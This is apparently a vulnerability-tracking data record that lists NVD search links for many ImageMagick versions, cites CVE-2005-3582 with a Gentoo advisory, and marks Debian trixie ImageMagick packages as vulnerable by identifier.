reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:4.2.9:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:4.2.9:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:4.2.9:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.2.0:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.2.0:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.2.0:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.2.6:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.2.6:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.2.6:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.0:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.3.0:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.0:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.1:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.3.1:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.1:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.2:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.3.2:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.2:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.3:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.3.3:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.3:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.4:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.3.4:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.4:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.5:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.3.5:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.5:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.6:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.3.6:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.6:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.7:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.3.7:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.7:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.8.2:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.3.8.2:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.8.2:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.9:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.3.9:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.3.9:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.0.5:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.4.0.5:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.0.5:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.1.2:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.4.1.2:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.1.2:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.2.3:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.4.2.3:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.2.3:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.3.11:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.4.3.11:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.3.11:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.4.5:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.4.4.5:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.4.5:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.5.1:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.4.5.1:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.5.1:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.6.3:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.4.6.3:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.6.3:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.7.4:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.4.7.4:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.7.4:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.8.3:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.4.8.3:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.8.3:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.9.1:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.4.9.1:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.4.9.1:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.1.4:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.5.1.4:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.1.4:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.2.5:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.5.2.5:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.2.5:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.3.2:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.5.3.2:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.3.2:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.4.4:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.5.4.4:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.4.4:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.5.3:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.5.5.3:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.5.3:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.6:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.5.6:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.6:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.7.31:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.5.7.31:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.7.31:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.7.35:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.5.7.35:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.7.35:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.7q16:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.5.7q16:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.7q16:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.7q8:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:5.5.7q8:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:5.5.7q8:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.0:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.0.7:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.0.0.7:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.0.7:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.1.4:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.0.1.4:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.1.4:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.2.7:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.0.2.7:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.2.7:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.3.5:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.0.3.5:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.3.5:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.4.4:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.0.4.4:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.4.4:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.5.3:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.0.5.3:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.5.3:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.6.2:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.0.6.2:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.6.2:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.7.3:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.0.7.3:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.7.3:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.8.3:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.0.8.3:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.0.8.3:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.0.9:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.1.0.9:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.0.9:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.1.6:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.1.1.6:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.1.6:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.2.7:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.1.2.7:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.2.7:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.3.7:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.1.3.7:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.3.7:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.4.5:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.1.4.5:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.4.5:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.5.8:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.1.5.8:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.5.8:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.6.9:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.1.6.9:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.6.9:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.7.5:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.1.7.5:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.7.5:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.8.7:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.1.8.7:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.8.7:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.9.4:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.1.9.4:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.1.9.4:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.2.0.8:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.2.0.8:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.2.0.8:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.2.1.7:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.2.1.7:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.2.1.7:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.2.2.5:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.2.2.5:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.2.2.5:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.2.3.6:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:6.2.3.6:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:6.2.3.6:::::::*

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2005-3582

reference_id

CVE-2005-3582

reference_type

scores

value	7.2
scoring_system	cvssv2
scoring_elements	AV:L/AC:L/Au:N/C:C/I:C/A:C

url

https://nvd.nist.gov/vuln/detail/CVE-2005-3582

reference_url	https://security.gentoo.org/glsa/200511-02
reference_id	GLSA-200511-02
reference_type
scores
url	https://security.gentoo.org/glsa/200511-02

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

